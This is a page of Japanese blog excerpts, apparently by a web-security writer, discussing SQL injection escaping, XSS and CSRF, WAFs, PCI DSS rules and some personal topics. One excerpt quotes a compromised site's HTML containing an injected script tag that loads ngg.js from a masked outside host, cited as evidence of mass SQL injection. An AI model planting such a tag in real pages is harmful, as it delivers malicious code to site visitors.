Google Analyticsより引用参照:食事する哲学者秋ゆえに思索にふけろう、まずは食事する哲学者だ、というわけではなくて、情報系の学部でこの時期に食事する哲学者を講義する、あるいはレポートの提出を求める、あたりですかね。
はてブで250以上のブックマークを得ている以下のエントリ。 PHP アプリケーションを作成する際には、可能な限りセキュアなアプリケーションにするために、次の 7 つの習慣を守る必要があります。 入力を検証する ファイルシステムを保護する データベースを…
yamagataさんの日記経由。MS ASPは、不正なパーセントエンコードされた文字列をデコードする際に、パーセント記号「%」を除去するようです。下表に、ASPでのデコード例と、その他の処理系を代表してPerlのCGIモジュール(CGI.pm)でのデコード例を挙げました。…
第02回まっちゃ445勉強会(第02回まっちゃ445勉強会 - まっちゃだいふくの日記★とれんどふりーく★)でWAFの話をさせていただきました。講演資料はこちら。 私自身の感想として、あらためて竹迫さん(id:TAKESAKO)は優しい方なのだなという思いを強くしま…
うわさのngg.jsを調べていたらこんな表示のサイトを見かけました。 HTMLソースは以下の通り 宮城県、福島県、山形県、岩手県、秋田県<script src=http://www.XXXXXX.com/ngg.js></script> おそらく、SQLインジェクションによりSCRIPT要素を埋め…
SQLのエスケープと聞いてやってきましたよ。2008-07-10 - T.Teradaの日記から 例えば、「\%foo」から始まる文字列を検索する場合には、どのようなSQL文を書けばよいのでしょうか。 条件は以下の通りです。 1. DBMSソフトはMySQL 2. ESCAPE節は使わない 【中…
Eiji James Yoshidaの記録を参考に、3つのブログのランキングをタイトル毎に並べてみた(2008年6月)。 1位そろそろSQLエスケープに関して一言いっとくか - SQLのエスケープ再考 2位SQLインジェクション対策 - SQLエスケープにおける「\」の取り扱い 3位4月か…
既に色々な方が紹介いただいていますが、、WASForum Conference 2008の7/5 Developers DAY - 事件は現場で起こっている……セキュリティライフサイクルとマルプラクティスにて、「SQLインジェクション対策再考」のタイトルで講演させていただくことになりまし…
会社のブログを立ち上げましたので、徳丸のブログは三種類になりました。www.tokumaru.org:純技術的なセキュリティの内容が中心になります。 www.hash-c.co.jp:Webアプリケーションの開発にまつわる発注や開発プロセスの話題を中心にします。会社のブログで…
えーっと、なんて言うのでしたっけ? (^^; 問題は、会社のホームページに早くこれができないといけないのだけど・・・ まぁ、ボチボチやっていきます。
ハテブの方で独立・起業系のコンテンツを時々チェックしていたため、「もしかして独立するの?」という反応を一部よりいただいておりました。京セラコミュニケーションシステム(KCCS)を辞めるわけではありませんが、3月をもってフルタイムの社員から、少し勤…
これはホテルの窓から見えるホテル川久の写真。 ここに泊まっているわけではないよ
長女(小1)の最新作です。
某SIerの入っているビルで。 馬鹿なこと書いているなぁと一瞬は思ったのですが、おそらくこの会社では徹夜明けなのでトイレで調髪する人が少なからずいるんでしょうね。 そのことに気づき、胸を突かれるような思いがしました 追記(2008/3/23) id:kazuhookuさ…
ITProの記事が契機となって、PCIDSS(PCIデータセキュリティ規準)およびパスワードに関する規定が話題となっている*1。「パスワードは90日ごとの変更」が義務づけられる!? | 日経 xTECH(クロステック) それに対して,PCIDSSは表現が具体的である。現在…
この前の日記わーい \(^o^)/ PL/0を JS で書いたよー! - ockeghem(徳丸浩)の日記で、JavaScript記述のPL/0を紹介したが、その開発過程を少し紹介してみたいと思う。 私の開発スタイルはどういうネーミングをしたらよいのか分からないが、ここ20年くら…
最近、JavaScriptで小さな処理系を書くのが流行っているらしい。 45歳を過ぎた私もやってみたいと思い、昔とった杵柄で、PL/0の処理系をJavaScriptで書いてみた。こちらをどうぞ。amachangみたいに4時間というわけにはいかなくて、動き出すには6時間くらい(…
ITproにWebメール狙うサイド・ジャッキング | 日経 xTECH(クロステック)と言う記事が。 7月末に米国・ラスベガスで開催されたセキュリティ・カンファレンス「BlackHat USA2007」で,無線LAN越しにWebメールのセッションをハイジャックするデモが行われた。…
こちらは色鉛筆で書いた絵です。ほとんど加工していません。
うさちゃんだそうです。 スキャナで読んで、ノイズ除去程度の加工をしました。
ockeghemが死んだわけじゃないよ。ockeghemという小惑星があったというお話。 以下、Wikipediaからの引用 オケゲム (小惑星) 出典: フリー百科事典『ウィキペディア(Wikipedia)』 7343 Ockeghem 仮符号・別名 1992 GE2 分類 小惑星 軌道の種類 小惑星帯 発…
最近、画像ファイルを用いたクロスサイト・スクリプティングが注目されている。本稿では、画像を悪用したXSSについて説明した後、対策方法について解説する。 画像によるXSSとはどのようなものか Internet Explorer(IE)の特性として、コンテンツの種類を判別…
ヤマガタさんとこ経由、ITmedia Newsから カナダのパスポート申請情報、単純なURL書き換えで丸見えに オンタリオ州ハンツビルにあるAlgonquin AutomotiveのITスタッフ、ジェイミー・ラニング氏は11月29日にeWEEKに、米国への旅行のためにオンラインでパスポ…
先の日記(XSSはブラウザ上でスクリプトが動き、CSRFはサーバー上でスクリプトが動く - ockeghem(徳丸浩)の日記)は、仕込んだネタがあたって多くの方に読んでいただいた。細かい内容については、頂戴した批判や反省もあるが、このテーマに対して多くの関心を…
電子マネーのウェブマネーの不正利用で逮捕者がでましたね。 以下、MSN産経ニュースから 電子マネー62万円詐取…警視庁5人を逮捕 調べでは、馬渕容疑者らは平成16年11月〜今年9月、ウェブマネー社(東京都港区)が発行する電子マネー「ウェブマネー」…
昨日の日記で、DK祭りで使われている脆弱性がXSSかCSRFかという問題になった。どうも、XSSとCSRFがごっちゃになっている人もいるように見受けるので、簡単な整理を試みたい。 XSSとCSRFには似た点がある。 どちらも「クロスサイト」という言葉が先頭につく …
秋のDK収穫祭などで騒がれている、いわゆるDK祭り。 さすがの私も、今夜半の祭りにはmaitter。 私のtwitterが荒らされていたのだ。 http://blog.livedoor.jp/dankogai/archives/50959103.html 現象から見てセッションハイジャックされたと思われるが、原因と…
昨日の日記について、池田雅一さんからコメントを頂戴した。また、Webサイトの方も修正が行われた。 池田雅一 原稿出した段階では、「エスケープが基本的な対策だが、Prepared Statementを使うと楽」と書いていたのに、記事になった時点で「だが」が削除され…
ockehgemのブックマークを見ていたところ、6人のユーザに登録された以下の記事があった。 サイト脆弱性をチェックしよう!--第6回:SQLインジェクションの検査方法, 池田雅一, ZDNET Japan, 2007年11月26日 また池田雅一か。顔見知りなのでズバリいくことに…
もう一つの日記徳丸浩の日記が、www.seozone.jpからのツッコミSPAMがあまりに酷く、今までは一々手で消してたけどあまりに目に余るので、tdiaryのフィルタに手を入れて同ドメイン名が記述されたツッコミを遮断するようにしました。ベタな方法だけど、しばら…
